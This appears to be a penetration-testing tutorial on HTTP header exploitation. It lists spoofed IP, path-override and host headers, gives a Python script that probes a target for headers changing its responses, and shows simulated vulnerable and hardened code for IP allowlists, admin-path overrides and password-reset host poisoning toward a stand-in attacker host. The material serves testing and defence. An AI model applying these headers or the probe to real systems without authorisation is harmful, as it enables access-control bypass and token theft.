Header Exploitation

Every web application relies on HTTP headers, but an administrator or developer may have misconfigured the stack so that it honours request headers it should not. On top of that, a reverse proxy or load balancer in front of the backend may interpret a header differently from the backend itself, and that mismatch can give you access to pages you are not supposed to reach.

What Can I Do With Headers?

If the application, or a proxy in front of it, trusts certain request headers, this can for example lead to:

  • Bypassing an IP-based block or allowlist
  • Redirecting the user to a different web application (e.g. via a poisoned absolute URL)
  • Bypassing path restrictions and reaching admin panels that are normally blocked at the edge
  • Making the victim's application send data (such as a password-reset token) to an attacker-controlled web application

Tools

The Burp extension Param Miner can brute-force these hidden, non-standard headers for you. Nikto works too, but in my experience it produces too many false positives.
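The manual version of what Param Miner automates, as an added example (not code from the original page or from Param Miner): send one baseline request, then one request per candidate header, and flag any header that changes the status code or body length. The `transport` hook and the default target URL are assumptions for this example; the default transport uses urllib against a live URL, and the test swaps in a fake one.

```python
"""Probe which request headers change a server's response.

Added example. A header that flips a 403 to a 200, or changes the body length,
is worth investigating by hand. `transport(url, headers)` is a hypothetical hook
so the comparison logic can run without a network.
"""
import urllib.error
import urllib.request

# Candidate headers taken from the lists on this page; the values are the usual
# loopback / attacker-controlled placeholders.
CANDIDATES = {
    "X-Forwarded-For": "127.0.0.1",
    "X-Real-IP": "127.0.0.1",
    "X-Originating-IP": "127.0.0.1",
    "True-Client-IP": "127.0.0.1",
    "Client-IP": "127.0.0.1",
    "Forwarded": "for=127.0.0.1",
    "X-Original-URL": "/admin/console",
    "X-Rewrite-URL": "/admin/console",
    "X-Forwarded-Host": "collaborator.com",
}


def urllib_transport(url, headers):
    """Default transport: returns (status, body) and does not raise on 4xx/5xx."""
    req = urllib.request.Request(url, headers=headers, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def probe_headers(url, candidates=CANDIDATES, transport=urllib_transport):
    """Return {header: (status, body_length)} for every candidate header whose
    response differs from the baseline request sent with no extra headers."""
    base_status, base_body = transport(url, {})
    baseline = (base_status, len(base_body))
    hits = {}
    for name, value in candidates.items():
        status, body = transport(url, {name: value})
        if (status, len(body)) != baseline:
            hits[name] = (status, len(body))
    return hits


if __name__ == "__main__":
    import sys
    # Assumed default target; pass a real URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080/admin"
    for header, (status, length) in probe_headers(target).items():
        print(f"{header}: status={status} length={length}")
```

Before trusting a hit, send the baseline twice: if the page is dynamic and the length changes on its own, compare status codes only or diff the bodies.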

Header Examples

Keep in mind that some of the IP-related headers below may also accept a hostname instead of an address, e.g. www.google.com or www.internal.example.com, so try a domain value as well (see the collaborator.com values further down).

IP-related Headers

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
Forwarded: for=127.0.0.1

The host, scheme and URL override headers (X-Forwarded-Host, X-Host, X-Forwarded-Server, X-Forwarded-Scheme, X-HTTP-Host-Override, X-Original-URL) take a hostname, a scheme or a path rather than an address; they are listed with suitable values in the sections below.
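Why `X-Forwarded-For: 127.0.0.1` bypasses an IP block, shown as an added example (not code from the original page): a vulnerable client-IP resolver takes the leftmost value of the chain, which the client wrote, while the hardened one only consults the header when the TCP peer is a known proxy and walks the chain from the right, so client-supplied hops are never reached. The allowlist, the trusted-proxy address and the request headers are constructed for the example.

```python
"""Client-IP derivation: vulnerable vs hardened. Added example."""
import ipaddress

# Constructed policy: who may reach the admin panel, and which proxy is trusted
# to append X-Forwarded-For. Both networks are assumptions for this example.
ADMIN_ALLOWLIST = [ipaddress.ip_network("127.0.0.0/8"),
                   ipaddress.ip_network("10.0.0.0/8")]
TRUSTED_PROXIES = [ipaddress.ip_network("192.0.2.10/32")]


def _in_any(nets, addr):
    """True if addr is a valid IP inside one of nets; False for garbage such as a hostname."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in nets)


def client_ip_vulnerable(headers, remote_addr):
    """Common mistake: trust the leftmost X-Forwarded-For value, which the client
    chooses, so 'X-Forwarded-For: 127.0.0.1' makes the request look local."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(headers, remote_addr):
    """Only honour X-Forwarded-For when the TCP peer is our proxy, and walk the
    chain from the right, skipping trusted proxies. Hops the client prepended sit
    on the left and are never reached. Returns None if nothing trustworthy exists."""
    if not _in_any(TRUSTED_PROXIES, remote_addr):
        return remote_addr          # direct connection: X-Forwarded-For is attacker input
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _in_any(TRUSTED_PROXIES, hop):
            continue                # another trusted hop, keep walking
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return None             # malformed value or hostname: refuse to guess
        return hop
    return None                     # the proxy forwarded nothing usable


def admin_allowed(headers, remote_addr, resolver):
    """Apply the allowlist to whichever client-IP resolver the app uses."""
    ip = resolver(headers, remote_addr)
    return ip is not None and _in_any(ADMIN_ALLOWLIST, ip)


if __name__ == "__main__":
    # Constructed: attacker at 203.0.113.5 connects straight to the app and spoofs the header.
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("vulnerable:", admin_allowed(spoofed, "203.0.113.5", client_ip_vulnerable))
    print("hardened:  ", admin_allowed(spoofed, "203.0.113.5", client_ip_hardened))
```

The same mistake survives behind a real proxy: the proxy appends the true peer, giving `127.0.0.1, 203.0.113.5`, and the leftmost-value resolver still picks the spoofed address. If more than one proxy layer exists, every layer's address has to be in the trusted list, or the walk stops early at an internal hop.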

Path-related Headers

X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
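How a path override header gets past an edge ACL, as an added example (not code from the original page): the edge blocks `/admin*` by looking only at the request line, while a backend that honours X-Original-URL / X-Rewrite-URL re-routes the request to whatever path the header names. The two-tier flow is simulated in-process with constructed requests; the fix shown is the edge dropping override headers it did not set itself.

```python
"""Edge path ACL vs backend URL override. Added example with a constructed
two-tier request flow."""

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
BLOCKED_PREFIX = "/admin"


def _norm(headers):
    """Header names are case-insensitive; compare them lower-cased."""
    return {k.lower(): v for k, v in headers.items()}


def edge_acl(path):
    """Edge rule as seen in many proxies/WAFs: decide on the request-line path only."""
    if path.startswith(BLOCKED_PREFIX):
        return (403, "blocked at edge")
    return None


def route(path):
    """Backend routing: the admin panel and everything else."""
    if path.startswith(BLOCKED_PREFIX):
        return (200, "admin console")
    return (200, "public page")


def backend_vulnerable(path, headers):
    """Backend that lets X-Original-URL / X-Rewrite-URL replace the route, which
    some frameworks do when the corresponding option is enabled."""
    h = _norm(headers)
    for name in OVERRIDE_HEADERS:
        if name in h:
            path = h[name]
            break
    return route(path)


def handle_request(path, headers, backend=backend_vulnerable, strip_overrides=False):
    """Run a request through the edge ACL and then the backend. strip_overrides=True
    is the fix: the edge removes override headers before forwarding."""
    denied = edge_acl(path)
    if denied:
        return denied
    if strip_overrides:
        headers = {k: v for k, v in headers.items() if k.lower() not in OVERRIDE_HEADERS}
    return backend(path, headers)


if __name__ == "__main__":
    print(handle_request("/admin/console", {}))
    print(handle_request("/", {"X-Original-URL": "/admin/console"}))
    print(handle_request("/", {"X-Original-URL": "/admin/console"}, strip_overrides=True))
```

The equivalent check during a test: if `GET /admin/console` returns 403 but `GET /` with `X-Original-URL: /admin/console` returns the admin page, the backend is routing on the override header.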

Host- and scheme-related Headers

These take a hostname or a scheme rather than an address. Supplying an attacker-controlled hostname (a Burp Collaborator domain, written here as collaborator.com) shows whether the application resolves it, fetches from it, or builds absolute links with it.

X-Host: collaborator.com
X-Forwarded-Host: collaborator.com
X-Forwarded-Server: collaborator.com
X-HTTP-Host-Override: collaborator.com
X-Forwarded-Scheme: http
Forwarded: host=collaborator.com;proto=http
X-Forwarded-For: collaborator.com
Origin: https://example.com (for CORS checks: see whether it is reflected in Access-Control-Allow-Origin)
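What a poisoned X-Forwarded-Host does when the application builds absolute links from it, as an added example (not code from the original page): a password-reset link builder that trusts X-Forwarded-Host and X-Forwarded-Scheme sends the token to collaborator.com, while the hardened builder only accepts a Host value from a configured allowlist and never lets the request choose the scheme. The allowlist, the reset path and the request headers are constructed for the example.

```python
"""Host header poisoning of an absolute URL. Added example."""
from urllib.parse import urlsplit

# Constructed: the hosts this application is legitimately served on.
ALLOWED_HOSTS = {"www.example.com", "example.com"}

# Constructed request: Host is correct, but the attacker added the X-Forwarded-* pair.
POISONED_REQUEST = {
    "Host": "www.example.com",
    "X-Forwarded-Host": "collaborator.com",
    "X-Forwarded-Scheme": "http",
}


def build_reset_link_vulnerable(headers, token):
    """Builds the absolute URL from whatever the request claims the host is, so
    X-Forwarded-Host (or a spoofed Host) decides where the token is delivered."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    scheme = headers.get("X-Forwarded-Scheme", "https")
    return f"{scheme}://{host}/reset?token={token}"


def build_reset_link_hardened(headers, token):
    """Accepts only an allowlisted Host, ignores the X-Forwarded-* variants and
    pins the scheme. Rejecting is the right outcome for an unknown Host."""
    hostname = headers.get("Host", "").split(":")[0].lower()
    if hostname not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {hostname!r}")
    return f"https://{hostname}/reset?token={token}"


def leaks_token(link):
    """True if following the link sends the token to a host outside ALLOWED_HOSTS."""
    return urlsplit(link).hostname not in ALLOWED_HOSTS


if __name__ == "__main__":
    bad = build_reset_link_vulnerable(POISONED_REQUEST, "t0k3n")
    good = build_reset_link_hardened(POISONED_REQUEST, "t0k3n")
    print(bad, "leaks" if leaks_token(bad) else "safe")
    print(good, "leaks" if leaks_token(good) else "safe")
```

The cleaner fix in production is to build such links from a canonical base URL in configuration and never from request headers at all; the allowlist version above is for applications that must serve several hostnames.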